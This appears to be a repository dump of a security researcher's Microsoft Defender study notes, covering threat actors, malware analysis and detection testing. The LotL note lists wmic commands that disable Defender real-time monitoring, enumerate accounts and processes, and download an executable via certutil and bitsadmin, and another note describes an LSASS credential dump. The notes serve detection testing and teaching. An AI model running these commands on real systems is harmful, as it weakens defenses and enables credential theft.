├── SecurityResearcher-Note-Folder ├── Day12-Volt-Typhoon-Base64.pdf ├── Day03-Microsoft-ThreatActorNamingTaxonomy.md ├── Day18-LotL-detection-part1.md ├── MDE-APIcallSimu.ps1 ├── Day12-Volt-Typhoon-Base64.md ├── Day02-APT29-Part1-Overview.md ├── Day01-Basic-Malware-Analysis.md ├── Day17-Hunting-APIcalls-insight.md ├── Day04-Mango-Sandstorm-Part2-AttackTechniques-Insights.md ├── Day11-MalwareAnalysis-Insights-part2.md ├── Day04-Mango-Sandstorm-Part1-Overview.md ├── Day06-M365D-XDR-AutomaticAttackDisruption.md ├── Day04-Mango-Sandstorm-Part3-AttackTechniques-Insights.md ├── Day02-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md ├── Day14-macOS-SIP-Bypass-Insights.md ├── Day02-APT29-Part2-Midnight-Blizzard.md ├── Day16-CloudId-Exfiltration-AttackReport-Part2.md ├── Day16-CloudId-Exfiltration-AttackReport-Part1.md ├── Day11-MalwareAnalysis-Insights-part1.md ├── Day13-WDigest-credential-harvesting-attack.md ├── Day05-AntivirusConfig-Tips.md ├── Day07-AiTM-Insights-XDR.md ├── Day02-APT29-Part3-Midnight-Blizzard.md ├── Day10-XDR-Insights-part2.md ├── Day08-WebShell-Insights-XDR.md ├── Day09-XDR-Insights-part1.md ├── Day19-ThreatActor-Discovery.md └── Day15-XDR-Insights-2024update.md ├── ProductResearch-Note-Folder ├── Day04-MDI-DeploymentConsiderations.pdf ├── Day03-MDO-FileDetonation-DeepAnalysis.md ├── Day01-MDE-MDI-BetterTogether-Part1.md └── Day02-MDE-MDI-BetterTogether-Part2.md ├── CopilotLOGs ├── 02-CopilotForSecurity-Architecture.md └── 01-CopilotForSecurity-History.md └── README.md /SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LearningKijo/SecurityResearcher-Note/HEAD/SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.pdf -------------------------------------------------------------------------------- /ProductResearch-Note-Folder/Day04-MDI-DeploymentConsiderations.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LearningKijo/SecurityResearcher-Note/HEAD/ProductResearch-Note-Folder/Day04-MDI-DeploymentConsiderations.pdf -------------------------------------------------------------------------------- /CopilotLOGs/02-CopilotForSecurity-Architecture.md: -------------------------------------------------------------------------------- 1 | # Microsoft Copilot for Security : LOG-02 2 | At first, we might have heard these key terms, Generative AI, OpenAI, ChatGPT, and Copilot, over the past year. 3 | Let's figure them out... I've understood their differences by using MS Docs and by asking ChatGPT and Copilot. 4 | - [x] Generative AI : Class of artificial intelligence models that can generate new content, such as text, images, or music, based on patterns learned from existing data. 5 | - [x] OpenAI : Research organization that develops AI models, including ChatGPT. 6 | - [x] ChatGPT : Specific AI model developed by OpenAI for chatting and conversation. 7 | - [x] Microsoft Copilot for Security : Generative AI-powered security solution that helps increase the efficiency and capabilities of defenders to improve security outcomes at machine speed and scale, while remaining compliant to responsible AI principles. 8 | > Source : 9 | > [What is Microsoft Security Copilot?](https://learn.microsoft.com/en-us/security-copilot/microsoft-security-copilot), [ChatGPT](https://openai.com/blog/chatgpt), Copilot 10 | 11 | 12 | ## Core Engines 13 | As far as I know, Microsoft Copilot for Security counts on two big pillar. 14 | - GPT4 model from OpenAI 15 | - Microsoft-developed security model. 16 | - Global threat intelligence (More than 65 trillion daily signals) 17 | - Microsoft Security products (Plugins) 18 | - Third-party security products (Plugins) 19 | 20 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/4c3331c6-6fb5-437a-beaa-a762db516453) 21 | > The infographic is available from [Microsoft Copilot for Security | Microsoft Security](https://www.microsoft.com/en-us/security/business/ai-machine-learning/microsoft-copilot-security) 22 | 23 | ## Architecture 24 | This is a high-level architecture diagram illustrating how Security Copilot works. 25 | 26 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/eeea60a3-92e8-4ba9-b2ea-c756fa7fb75d) 27 | > The graph is available from Microsoft Docs - [What is Microsoft Security Copilot?](https://learn.microsoft.com/en-us/security-copilot/microsoft-security-copilot) 28 | 29 | I came across some new words and looked up their meanings. 30 | - [x] Azure OpenAI : Azure OpenAI Service provides REST API access to OpenAI's powerful language models including the GPT-4, GPT-4 Turbo with Vision, GPT-3.5-Turbo, and Embeddings model series. 31 | - [x] LLM : Large Language Model (LLM) is a sophisticated AI system trained on vast amounts of text data to understand and generate human-like language across various tasks. 32 | - [x] Responsible AI : Approach to developing, assessing, and deploying AI systems in a safe, trustworthy, and ethical way. 33 | 34 | > Source : 35 | > [What is Azure OpenAI Service?](https://learn.microsoft.com/en-us/azure/ai-services/openai/overview), [What is Responsible AI?](https://learn.microsoft.com/en-us/azure/machine-learning/concept-responsible-ai?view=azureml-api-2), [ChatGPT](https://openai.com/blog/chatgpt) 36 | 37 | #### Disclaimer 38 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 39 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day03-Microsoft-ThreatActorNamingTaxonomy.md: -------------------------------------------------------------------------------- 1 | # Day 3 - Microsoft, a threat actor naming taxonomy 2 | ![image](https://user-images.githubusercontent.com/120234772/233586114-ba90b790-81f2-4739-b5f6-cba034e4ddf1.png) 3 | 4 | ### Why did Microsoft switch to using weather-themed names for threat actors? 5 | The threat landscape is constantly evolving, with the complexity, scale, and volume of threats increasing. As highlighted in [the blog](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/), Microsoft Threat Intelligence community has tracked 300+ threat actors including 160 nation-state actors and 50 ransomware groups over a decade, discovering, tracking and identifying targeted malicious activity and sharing critical intelligence with customers. ***In order to provide better context and make it easier for security professionals to understand and prioritize threats***, Microsoft is adopting a new threat actor naming taxonomy based on weather. 6 | 7 | ![image](https://user-images.githubusercontent.com/120234772/233846294-a4ae4e61-0fe3-4866-bfff-2de842d73ce5.png) 8 | > e.g. a threat actor naming taxonomy, [How Microsoft names threat actors](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide) 9 | 10 | ## The comprehensive map 11 | The comprehensive map is available from [here](https://download.microsoft.com/download/4/5/2/45208247-c1e9-432d-a9a2-1554d81074d9/microsoft-threat-actor-list.xlsx). 12 | 13 | ![image](https://user-images.githubusercontent.com/120234772/233592868-e35ed554-c0bf-4688-9656-b74c3df7719b.png) 14 | 15 | ## Threat Actor Insights 16 | In Threat Actor Insights, [Cybersecurity + Threat Intelligence | Security Insider](https://www.microsoft.com/en-us/security/business/security-insider/#office-ContentAreaHeadingTemplate-hkzu7ix) page, you can access advanced insights into threat actors, including their target industries, characteristics, detailed security reports, and more. 17 | 18 | ![image](https://user-images.githubusercontent.com/120234772/233085458-3ab6f1ac-8dae-4cc3-bb57-ac121cc84e52.png) 19 | > Threat Actor Insights 20 | 21 | ![image](https://user-images.githubusercontent.com/120234772/233846054-0c658312-1fe3-49fe-9271-884338448be7.png) 22 | > Target industries, characteristics and so on 23 | 24 | ![image](https://user-images.githubusercontent.com/120234772/233846069-dba7baa8-09d2-498d-a549-efbf1adb356d.png) 25 | > Detailed security reports 26 | 27 | ## Reference 28 | 1. [How Microsoft names threat actors](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/microsoft-threat-actor-naming?view=o365-worldwide) (https://aka.ms/threatactors) 29 | 2. [Microsoft shifts to a new threat actor naming taxonomy](https://www.microsoft.com/en-us/security/blog/2023/04/18/microsoft-shifts-to-a-new-threat-actor-naming-taxonomy/) 30 | 3. [Cybersecurity + Threat Intelligence | Security Insider](https://www.microsoft.com/en-us/security/business/security-insider/#office-ContentAreaHeadingTemplate-hkzu7ix) 31 | 32 | #### Disclaimer 33 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 34 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day18-LotL-detection-part1.md: -------------------------------------------------------------------------------- 1 | # LotL techniques with MDE detection - Part 1 2 | Hello everyone, 3 | 4 | For a long time, I have seen Living off the Land (LotL) techniques discussed in Microsoft Security blogs, and recently I have been learning various attack techniques, especially those related to LotL. 5 | That's why I believe this is a great time to share my learning and detection insights in MDE through this blog. 6 | 7 | ### What is living off the land ? 8 | 9 | [Microsoft Security blog](https://www.microsoft.com/en-us/security/blog/2018/09/27/out-of-sight-but-not-invisible-defeating-fileless-malware-with-behavior-monitoring-amsi-and-next-gen-av/) explains that “living off the land”, as malware only uses resources already available in the operating system. 10 | 11 | I will show you how LotL techniques were used by attackers, based on past Microsoft Security blogs. 12 | 13 | 14 | ### [Astaroth “living-off-the-land”](https://www.microsoft.com/en-us/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/) 15 | This is a somewhat older blog, but I love it because it includes some Windows LotL-related attacks in the attack flow. 16 | 17 | 1. LNK 18 | 2. WMI 19 | 3. Bitsadmin 20 | 4. Certutil 21 | 22 | **LNK** : One common pattern is that an attacker creates a LNK file with a target path that executes a PowerShell command to download and run a malicious script from the internet. 23 | 24 | **WMI** : Query the operating system (OS) for specific properties and then formats the output using a custom format file located at a URL. 25 | 26 | **Bitsadmin / Certutil** : The commands bitsadmin and certutil can be exploited in cyberattacks, particularly in the context of malware delivery and command-and-control (C2) activities, such as downloading and uploading files. 27 | 28 | ![image](https://github.com/user-attachments/assets/f3ba69a1-f9bf-4300-9b03-551917f9875f) 29 | > Astaroth “living-off-the-land” attack chain showing multiple legitimate tools abused 30 | --- 31 | 32 | ## Microsoft Defender for Endpoint detection alerts 33 | 34 | **Test commands** 35 | ```cmd 36 | wmic process call create "powershell.exe -NoProfile -ExecutionPolicy Bypass -Command \"Set-MpPreference -DisableRealtimeMonitoring 1\"" 37 | wmic process get caption,executablepath,commandline /format:csv > %Temp%\commands.csv 38 | wmic useraccount get /ALL /format:csv > %Temp%\UserAccounts.csv 39 | wmic qfe get description,installedOn /format:csv > %Temp%\installedapp.csv 40 | wmic process call create "cmd.exe /c certutil -urlcache -f \"https://aka.ms/ioavtest\" \"%TEMP%\\validatecloud.exe\"" 41 | wmic process call create "cmd.exe /c bitsadmin /transfer mydownloadjob /download /priority high \"https://aka.ms/ioavtest\" \"%TEMP%\\validatecloud.exe\"" 42 | ``` 43 | 44 | ***The pentest device was protected by Defender Antivirus and Microsoft Defender for Endpoint, with Tamper Protection turned on.*** 45 | 46 | These alerts have been detected by MDE. 47 | - Suspicious Process Discovery 48 | - Suspicious User Account Discovery 49 | - Anomalous account lookups 50 | - Suspicious WMI process creation 51 | - Suspicious file creation by BITSAdmin tool 52 | - Use of living-off-the-land binary to run malicious code 53 | - Suspicious behavior by cmd.exe was observed 54 | 55 | ![image](https://github.com/user-attachments/assets/ef4c422e-d4c9-482a-84cc-1c4ab75e46eb) 56 | 57 | ![image](https://github.com/user-attachments/assets/b58e251a-ca2f-4df5-9d4a-47dc51a5a747) 58 | 59 | #### Disclaimer 60 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 61 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/MDE-APIcallSimu.ps1: -------------------------------------------------------------------------------- 1 | #Replace "XXXXXXXXXXXXXXXXXXXX" with the appropriate IDs relevant to your tenant/application (quotes required) 2 | $appId = "XXXXXXXXXXXXXXXXXXXX" 3 | $appSecret = "XXXXXXXXXXXXXXXXXXXX" 4 | $tenantId = "XXXXXXXXXXXXXXXXXXXX" 5 | 6 | Write-Host "+++ MDE device tag with API calls +++" 7 | 8 | #Connect to Microsoft Graph 9 | $SecuredPasswordPassword = ConvertTo-SecureString -String $appSecret -AsPlainText -Force 10 | $ClientSecretCredential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $appId, $SecuredPasswordPassword 11 | Connect-MgGraph -TenantId $tenantId -ClientSecretCredential $ClientSecretCredential -NoWelcome 12 | 13 | #Function to run a query 14 | $resourceAppIdUri = 'https://api.securitycenter.microsoft.com' 15 | 16 | $oAuthUri = "https://login.microsoftonline.com/$TenantId/oauth2/token" 17 | $body = [Ordered] @{ 18 | resource = "$resourceAppIdUri" 19 | client_id = "$appId" 20 | client_secret = "$appSecret" 21 | grant_type = 'client_credentials' 22 | } 23 | 24 | try { 25 | $response = Invoke-RestMethod -Method Post -Uri $oAuthUri -Body $body -ErrorAction Stop 26 | $aadToken = $response.access_token 27 | Write-Host "Succeeded to get token value --------------------------------------------------- [ OK ]" -ForegroundColor Green 28 | } catch { 29 | #Error handling 30 | Write-Error "$($_.Exception.Message)" 31 | } 32 | 33 | #Advanced Hunting Query 34 | $query = 'DeviceInfo | where OSPlatform in ("Windows10", "Windows11") | summarize arg_max(Timestamp, *) by DeviceId, DeviceName' 35 | 36 | #Convert the query to JSON 37 | $body = @{ 38 | Query = $query 39 | } | ConvertTo-Json 40 | 41 | #Invoke Microsoft Graph security API 42 | $result = Invoke-MgGraphRequest -Method POST -Uri "https://graph.microsoft.com/v1.0/security/runHuntingQuery" -Body $body 43 | 44 | #Display the results 45 | $table = $result.results | ForEach-Object { 46 | [PSCustomObject]@{ 47 | DeviceId = $_.DeviceId 48 | DeviceName = $_.DeviceName 49 | } 50 | } 51 | 52 | #Check the value of the DeviceId 53 | If ($null -eq $table) { 54 | Write-Host "No value from AH query -------------------------------------------------------- [ NO ]" -ForegroundColor Yellow 55 | } else { 56 | Write-Host "Succeeded to get AH query + value ---------------------------------------------- [ OK ]" -ForegroundColor Green 57 | } 58 | 59 | #Show device id value in table 60 | $counter = 1 61 | Foreach ($getMachine in $table) { 62 | Write-Host " +-- [$counter] Device ID:" $getMachine.DeviceId ", Name:" $getMachine.DeviceName 63 | $counter++ 64 | } 65 | 66 | Write-Host "" 67 | 68 | #Tagging devices 69 | Write-Host "--- MDE API call to tag devices ---" 70 | 71 | Foreach ($machine in $table.DeviceId) { 72 | 73 | Start-Sleep -Seconds 3 74 | 75 | $url = "https://api.securitycenter.microsoft.com/api/machines/" +$machine+ "/tags" 76 | $headers = @{ 77 | 'Content-Type' = 'application/json' 78 | Accept = 'application/json' 79 | Authorization = "Bearer $aadToken" 80 | } 81 | $tag= @{ 82 | 'Value' = 'Ninja' 83 | 'Action' = 'Add' 84 | } 85 | 86 | #Output the body of the request to see if the tag is being applied correctly 87 | $body = ConvertTo-Json -InputObject $tag 88 | 89 | try { 90 | $response = Invoke-WebRequest -Method Post -Uri $url -Headers $headers -Body $body -ErrorAction Stop 91 | Write-Host "Succeeded to tag [$($tag['Value'])] : $machine ------------ [ OK ]" -ForegroundColor Green 92 | } catch { 93 | #Error handling 94 | Write-Error "$($_.Exception.Message)" 95 | } 96 | } 97 | 98 | Write-Host "--- END ---" 99 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day12-Volt-Typhoon-Base64.md: -------------------------------------------------------------------------------- 1 | # Day 12 - Base64 decode & Volt Typhoon insights 2 | Volt Typhoon, a state-sponsored actor based in China, is a sophisticated cyberattack targeting critical infrastructure in the United States. It typically focuses on espionage and information gathering, relying on "living off the land techniques" and "hands-on-keyboard activity". Here is the Volt Typhoon attack diagram with comments. If you are interested in a detailed attack technique breakdown, you can find it in [this blog](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/). 3 | 4 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/14592722-1c46-4b47-84a0-5cd16de1277c) 5 | 6 | > Volt Typhoon attack diagram with comments 7 | 8 | ## Credential access : [Base64 Encode to Decode] 9 | In Volt Typhoon, during the credential access phase, Base64 encoding was used to execute a command aimed at dumping credentials through the Local Security Authority Subsystem Service (LSASS). 10 | 11 | In this analysis, I would like to provide a high-level mapping of the logic and the attack details of the LSASS dump command as described in the Microsoft Security blog. 12 | Additionally, I will demonstrate how to encode the command as Base64. 13 | 14 | #### LSASS dump command - Simulation 15 | This command is telling cmd.exe to use rundll32.exe to run a function called MiniDump from the comsvcs.dll file. 16 | It's saving the result as a dump file named out.dmp in the C:\temp directory and specifying that it should be a full dump. 17 | 18 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/5092cda1-e588-4c1a-84e3-a1a51b5eb6d5) 19 | 20 | 21 | #### LSASS dump command - Volt Typhoon 22 | [Volt Typhoon](https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/) - command to dump LSASS process memory, encoded in Base64 23 | 24 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/324286fe-fe00-4735-bf56-1ddcd2546923) 25 | 26 | 27 | #### Encode the command to perform an LSASS dump with Base64 in PowerShell 28 | 29 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7039875e-fbc1-4086-8105-d51fd3f42eb1) 30 | 31 | 32 | ## Microsoft Defender for Endpoint detection 33 | After running the encoded script on the device, within a few minutes, two alerts were generated, which were eventually combined into one incident. 34 | One of the great capabilities of Microsoft Defender for Endpoint is its ability to decode the base64-encoded command line, and the insights will be displayed on the alert page. 35 | 36 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/7a87e303-a152-4af0-84a1-3c67ac1460d2) 37 | 38 | > Microsoft Defender for Endpoint captured "Credential Dump" 39 | 40 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/3bbeeebb-ff89-48b9-a75f-a2e91d960d21) 41 | 42 | > Decoding the base64-encoded command line in Microsoft Defender for Endpoint 43 | 44 | By using [base64_encoded_tostring](https://learn.microsoft.com/en-us/azure/data-explorer/kusto/query/base64_encode_tostringfunction) operator in KQL, it is possible to decode base64-encoded commands. 45 | Below is an example of base64_encoded_tostring, which may initially show the result as null. 46 | However, when you copy and paste it into a note, the entire command is displayed without any issues. 47 | 48 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/b8b39d30-c710-45c8-a655-b3f0c29eb68a) 49 | 50 | 51 | #### Disclaimer 52 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 53 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day02-APT29-Part1-Overview.md: -------------------------------------------------------------------------------- 1 | # Day 2 - APT29 Overview 2 | While I am tracing back the history of the APT29 attack(YTTRIUM), I have a few questions, and I hope that these questions and my curiosity will help someone with their security incident response. Therefore, I will cover 4 points regarding APT29 attacks, which are as follows: 3 | 4 | 1. What is APT29 attack 5 | 2. What is the main objective of APT29 6 | 3. APT29 associated groups 7 | 4. APT29 attack techniques 8 | 9 | ### APT29 attack blogs 10 | |# | Title| About| 11 | |:---|:---|:---| 12 | |1 | Day2-APT29-Overview.md ****| Talk about APT29 attack overview | 13 | |2 | [Day2-APT29-Part2-Midnight-Blizzard.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day2-APT29-Part2-Midnight-Blizzard.md)| Talk about APT29/Midnight-Blizzard(previously YTTRIUM) | 14 | |3 | [Day2-APT29-Part3-Midnight-Blizzard.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day2-APT29-Part3-Midnight-Blizzard.md)| Talk about APT29/Midnight-Blizzard(previously NOBELIUM) | 15 | |4 | [Day2-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md](https://github.com/LearningKijo/SecurityResearcher-Note/blob/main/SecurityResearcher-Note-Folder/Day2-APT29-Part4-Midnight-Blizzard-MDE-EvaluationLab.md) | Talk about APT29/Midnight-Blizzard with demo| 16 | 17 | ## What is APT29 attack ? 18 | APT29 (Advanced Persistent Threat 29), also known as Cozy Bear, is a cyber espionage group believed to be operating on behalf of the Russian government 19 | that has been involved in high-profile cyber attacks against various targets, including government agencies and critical infrastructure. The group is known for using advanced hacking techniques, such as spear phishing and zero-day exploits, as well as social engineering tactics. 20 | 21 | ## What is the main objective of APT29 ? 22 | > What is the main objective of APT29 ?
23 | > Is it to break the IT environment, obtain money, or steal personal information? 24 | 25 | Probably, the main objective of APT29, also known as Cozy Bear, is believed to be espionage and intelligence gathering for the Russian government. Their targets have included government entities, defense contractors, and research organizations, among others. While financial gain may be a secondary objective, their primary focus is on collecting sensitive information and intellectual property. 26 | 27 | ## APT29 associated groups 28 | There are several groups associated with APT29, and each group uses different attack techniques. 29 | - IRON RITUAL 30 | - IRON HEMLOCK 31 | - NobleBaron 32 | - Dark Halo 33 | - StellarParticle 34 | - Midnight Blizzard (NOBELIUM, YTTRIUM) 35 | - UNC2452 36 | - The Dukes 37 | - Cozy Bear 38 | - CozyDuke. 39 | >**Note** : [MITRE ATT&CK | APT29 ](https://attack.mitre.org/groups/G0016/) 40 | 41 | ## APT29 attack techniques 42 | ### The most common attack techniques 43 | 1. Spear-phishing emails 44 | 2. Watering hole attacks 45 | 3. Zero-day exploits 46 | 4. Remote access tools 47 | 5. Malware attacks 48 | 49 | Overall, APT29 is a highly sophisticated threat group that uses a combination of social engineering, advanced hacking techniques, and custom malware to gain access to target systems and steal sensitive information. 50 | 51 | ### MITRE ATT&CK APT29 attack map 52 | In the Cybereason blog, APT29 attack techniques are captured very well using the MITRE ATT&CK framework. 53 | 54 | ![image](https://user-images.githubusercontent.com/120234772/231052172-59b042b9-996a-4539-b6f3-09f493ad936e.png) 55 | > APT29 Evaluation: Technique scope. Credit: MITRE ATT&CK, [Cybereason](https://www.cybereason.com/blog/understanding-the-mitre-attck-apt29-round-2-evaluation) 56 | 57 | #### Disclaimer 58 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 59 | -------------------------------------------------------------------------------- /ProductResearch-Note-Folder/Day03-MDO-FileDetonation-DeepAnalysis.md: -------------------------------------------------------------------------------- 1 | # MDO File Detonation & Deep Analysis insight 2 | Hello, all defenders and threat hunters, and thank you for visiting my product research note. 3 | Most of the questions I receive regarding Microsoft Defender for Office 365 (MDO) relate to sandbox analysis, specifically, what we refer to as ***'File Detonation & Deep Analysis'***. 4 | For instance, there's curiosity about whether MDO genuinely examines an attachment within a sandbox environment, and if detonation indeed takes place. 5 | Additionally, there's a common inquiry about how one can test and validate that this process is functioning as intended. 6 | Therefore, today, I am thrilled to share insights into File Detonation & Deep Analysis, specifically focusing on Safe Attachments in MDO. 7 | 8 | ## Sample HTML Files 9 | To validate File Detonation & Deep Analysis initially, I created [some simple HTML-based attachments](https://github.com/LearningKijo/ResearchDev/tree/main/DEV01-RedirectAttachment). 10 | There are three different types of attachments, all functioning similarly — redirecting to a malicious download site after being opened for 5 seconds. 11 | The distinction lies in their respective HTML appearances. 12 | 13 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/8d72c037-b3bf-4409-82ab-f7804ef0998d) 14 | 15 | > HTML file templates 16 | 17 | At this point, I utilized [DEV01-Attachment-Type1.html](https://github.com/LearningKijo/ResearchDev/blob/main/DEV01-RedirectAttachment/DEV01-HTML/DEV01-Attachment-Type1.html) and sent an email to the targeted user with the attachment. 18 | 19 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/181c09a7-d0d4-476b-95cc-11449c9dc5ea) 20 | 21 | ## Result - MDO Email Entity Page 22 | After a few minutes, MDO successfully detected the email as suspicious and moved it to quarantine. 23 | When you examine the "Detection technology" section, you can see ***"File Detonation"***, confirming that the email was flagged as a result of "File Detonation". 24 | I would also like to share the official document here to provide the definition of "File Detonation". 25 | 26 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/0b1279d2-dba4-4abd-bb98-006e3467d015) 27 | 28 | > [!Note] 29 | > ***File detonation : Safe Attachments detected a malicious attachment during detonation within a sandbox***
30 | > [Understanding detection technology in the email entity page of Microsoft Defender for Office 365](https://learn.microsoft.com/en-us/microsoft-365/security/office-365-security/step-by-step-guides/understand-detection-technology-in-email-entity?view=o365-worldwide) 31 | 32 | Continuously, when examining the Attachments tab in the Email Entity page, you will find detailed information about the attachment, including general details such as Verdict, Hash/File IoC, Size, Analysis time, and more. 33 | Moreover, you can also access 'Deep Analysis,' providing insights into how the HTML file appears after the end-user clicked on it, including captured UI snapshots. 34 | 35 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/bcb2ece6-7754-49b1-bf3f-2f82b3e49182) 36 | 37 | Upon scrolling down the Deep Analysis page, you'll find a detailed list of all relevant URLs, IPs, and Hashes associated with the attachment. 38 | It's worth mentioning that while not all observables may be flagged as suspicious, similar to the Deep Analysis feature in MDE, the file is initially treated as potentially suspicious. Therefore, we can analyze how this file is likely to behave by examining the valuable insights collected. 39 | 40 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/49fbf701-f984-413f-a306-e50e9523f22c) 41 | 42 | #### Disclaimer 43 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 44 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day01-Basic-Malware-Analysis.md: -------------------------------------------------------------------------------- 1 | # Day 1 - Malware Analysis 2 | Malware analysis is the process of examining malicious software, also known as malware, to understand how it works and how it can be detected and prevented. While I haven't delved into deeper aspects of malware analysis such as reverse engineering, I have had the opportunity to explore basic malware analysis. I hope that sharing my logs will help someone who wants to take their first steps into malware analysis. 3 | 4 | Basic malware analysis consists of both static and dynamic analysis, as I highlighted in the red line below: 5 | ![image](https://user-images.githubusercontent.com/120234772/209261305-942e1796-f96d-403f-b151-0d4083d80bdb.png) 6 |
7 | > How You Can Start Learning Malware Analysis | SANS Institute! 8 | 9 | # Reference 10 | ■ [How You Can Start Learning Malware Analysis | SANS Institute!](https://www.sans.org/blog/how-you-can-start-learning-malware-analysis/)
11 | ■ [Practical Malware Analysis Essentials for Incident Responders](https://www.youtube.com/watch?v=20xYpxe8mBg&feature=emb_title) 12 | 13 | 14 | # Analysis Tips 15 | There are several points which analysts need to investigate during malware analysis. Here are some tips which are highly effective for the analysis. 16 | 17 | | Static Analysis | Comment/Memo | 18 | | :------------- | ------------- | 19 | | File Type |Check the magic number. For example, "MZ" indicates a .exe file. | 20 | | Packers |Check the packers - attacker uses compression such as UPX, MEW and so on to obfuscate PE file. | 21 | | Timestamps |Check when the PE file was compiled. | 22 | | Hash value |MD5, SHA1, SHA256 - you can leverage the values for various ways - registration as IoC and threat hunting. | 23 | | Dll (Libraries) |Dll and Function help malware analysts to identify what capabilities the PE file has.| 24 | | Function (Imports / Exports) |Dll and Function help malware analysts to identify what capabilities the PE file has.| 25 | | Strings |Find/Get hints for understanding the PE file such as IP, URL, Path, Dll, Function and etc. | 26 |
27 | 28 | | Dynamic Analysis | Comment | 29 | | :------------- | ------------- | 30 | | Network indicator | In the static analysis phase, you could get some clues related to network activities from string values. For example, you can track the network activities such as **HTTP(80), DNS(53) or even filtering some URL keywords** by using Wireshark. | 31 | | Host indicator | In the static analysis phase, you could get some clues related to host activities from string values - **PE file, Process, Command, Path and so on.** These are highly invaluable keys in dynamic analysis. For instance, Tracking the timeline based activity for PE file. Monitoring the relation of PE file such as process tree. Confirming the activities one by one by suspending and resuming the process. Or even comparing registry key's activity before and after malware execution.| 32 | 33 | # Analysis Tools 34 | During basic static/dynamic malware analysis, I usually use these tools and access websites as follows:
35 | ### Static Analysis 36 | ■ Pestudio (https://www.winitor.com/download)
37 | ■ VirusTotal (https://www.virustotal.com/gui/home/upload)
38 | ■ floss (https://github.com/mandiant/flare-floss)
39 | ■ MalAPI.io (https://malapi.io/) 40 | 41 | ### Dynamic Analysis 42 | ■ Wireshark (https://www.wireshark.org/download.html)
43 | ■ TCPView (https://learn.microsoft.com/en-us/sysinternals/downloads/tcpview)
44 | ■ Process Monitor (https://learn.microsoft.com/en-us/sysinternals/downloads/procmon)
45 | ■ Process Explorer (https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer)
46 | ■ Process Hacker (https://processhacker.sourceforge.io/)
47 | ■ regshot (https://sourceforge.net/projects/regshot/) 48 | 49 | 50 | # Malware Sample 51 | ■ [theZoo - A Live Malware Repository](https://github.com/ytisf/theZoo) 52 | 53 | #### Disclaimer 54 | The views and opinions expressed herein are those of the author and do not necessarily reflect the views of company. 55 | -------------------------------------------------------------------------------- /SecurityResearcher-Note-Folder/Day17-Hunting-APIcalls-insight.md: -------------------------------------------------------------------------------- 1 | # Advanced Hunting - API calls insight 2 | APIs are highly valuable for security operations, and nowadays, we are increasingly transitioning towards more SOAR solutions. 3 | These solutions facilitate incident management, response to impacted assets, and report generation using APIs. 4 | 5 | At first, I really love this blog, discussing how we can effectively use MDE API calls to tag devices - [How to use tagging effectively (Part 3) - Scripting tags](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/how-to-use-tagging-effectively-part-3-scripting-tags/ba-p/1964073) 6 | 7 | Today, I'd like to share insights and address confusion regarding the use of hunting-related API calls based on my past testing experiences. 8 | 9 | ### First discovery ... many APIs.... 10 | As far as I know, originally there were MDE APIs for advanced hunting. 11 | However, after XDR was introduced to Microsoft Security, known as "Microsoft Threat Protection -> Microsoft 365 Defender, ***Nowadays, we call it - Microsoft Defender XDR***", we started using Advanced Hunting APIs. 12 | Now, there is a shift towards using Microsoft Graph security API instead of Advanced Hunting API. 13 | 14 | As you can see in [the Microsoft documentation](https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting), it states that the Advanced Hunting API is the old version, and it is recommended to use Microsoft Graph security API instead. 15 | 16 | ![image](https://github.com/LearningKijo/SecurityResearcher-Note/assets/120234772/69a29672-a6a0-457e-ac91-c6ed25a1a15d) 17 | 18 | When we consider the API history, it appears as follows; 19 | 20 | 